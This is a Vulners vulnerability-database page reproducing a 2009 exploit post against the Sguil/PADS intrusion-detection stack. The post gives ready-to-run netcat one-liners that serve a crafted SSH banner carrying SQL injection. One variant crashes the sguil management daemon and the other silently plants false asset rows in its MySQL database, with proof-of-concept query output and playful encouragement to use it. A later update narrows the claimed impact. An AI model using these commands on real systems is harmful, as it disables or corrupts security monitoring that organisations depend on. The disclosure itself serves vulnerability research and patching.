Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Sguil/PADS Remote Server Crash Vulnerability

🗓️ 18 Jul 2009 00:00:00Reported by RootType 
seebug
 seebug🔗 www.seebug.org👁 29 Views

Sguil/PADS Remote Server Crash Vulnerability. Exploit allows remote server crash and silent data injection into MySQL database, affecting IDS monitoring functionality

Code

                                                Sguil/PADS Denial of Service exploit
by Ataraxia (Benjamin Rose)
Public announcement made 7/15/09.

Please visit http://allmybase.com/ (my blog) for more up-to-date
information, and a quick patch.

More in-depth article available at: http://allmybase.com/?p=72

This more in-depth article does include additional details and
the actual code that is being exploited, if you're interested...

##########################################################################
UPDATE 7/17/09 @ 14:41:
In speaking with the creators of the sguil software, it seems that
I have greatly overestimated the reach of this bug. I had assumed that
it would be possible to run multiple SQL commands within a single TCL
mysqlexec() statement, an assumption that now seems incorrect. This means
that, at best, this hole becomes a denial of service attack that could
inject incorrect data into the sguil database, and/or kill the sguil
daemon, a noisy operation. My apologies for this initial overzealousness.
##########################################################################

ORIGINAL POST, UNMODIFIED:
This exploit has the ability to render any Intrusion Detection
System utilizing the sguil monitoring useless. At the lowest level,
you can kill the master logging daemon that collates the data into
a MySQL database. I've also been able to inject random and useless
data into the MySQL database, which opens the door for an obfuscation
of an attack, or a flat-out denial of service attack. There also exists
the possibility of dropping the database altogether, though I was not
able to make this happen during my preliminary testing of the attack.

The sguil sensor boxes report back to a sguil daemon on a management server,
which in turn puts the data received into a MySQL database. The sensor
collects data from many sensor agents, the most popular ones including snort
and sancp. Since snort is the de-facto standard NIDS, sguil is found in a lot
of places where there are mission-critical NIDS, making this a potent
vulnerability. The idea here is to craft a special packet containing a SQL
statement and send it across the wire, such that the sguil-agents will pick up
on it. We will exploit the Passive Asset Detection System (PADS) -> sguil
relationship, which will be monitoring for said banner packets. Thanks to the
availability of the netcat program, there is also no need for any programming
skill. Also, the attack can run on any port, so even an unprivileged user
could potentially run this attack.

Without further ado, here's the good stuff:

TO CRASH THE SERVER:
from a box that has its traffic monitored, run
echo “SSH-2.0-OpenSSH_1.4′,’deadbeefcafe’);–” | nc -l 7777
...and then telnet to port 7777 from another box. There will be a syntax
error in the sguil management daemon's SQL insert statement, and it will
crash rather ungracefully. This is highly noticable, so be careful!

TO INJECT DATA SILENTLY:
from a box that has its traffic monitored, run
echo “SSH-2.0-OpenSSH_1.4′,’deadbeefcafe’)–” | nc -l 8888
...and then telnet to port 8888 from another box. The difference here is the
semicolon in the statement. This will insert an asset into the SQL database as
ssh version 1.4, protocol 2.0. Obviously, you can have some fun with this ;-)

PROOF OF CONCEPT:
mysql> use sguildb;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> select * from pads where `hex_payload`=’deadbeefcafe’;
+————–+—–+———-+———————+————+———+——+———-+————-+————–+
| hostname | sid | asset_id | timestamp | ip | service | port | ip_proto | application | hex_payload |
+————–+—–+———-+———————+————+———+——+———-+————-+————–+
| [REMOVED] | 1 | 7 | 2009-06-08 14:28:02 | [REMOVED] | ssh | 1061 | 6 | OpenSSH 1.4 | deadbeefcafe |
+————–+—–+———-+———————+————+———+——+———-+————-+————–+
1 row in set (0.01 sec) 


Note that you don't even need to put in legit hex into the attack for it to work. Bonus points
if you put in a hexadecimal message to the sysadmin that doesn't even contain legit hex.

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
18 Jul 2009 00:00Current
7.1High risk
Vulners AI Score7.1
sguilpadsremote server crashdenial of serviceexploitmysqlids monitoring
29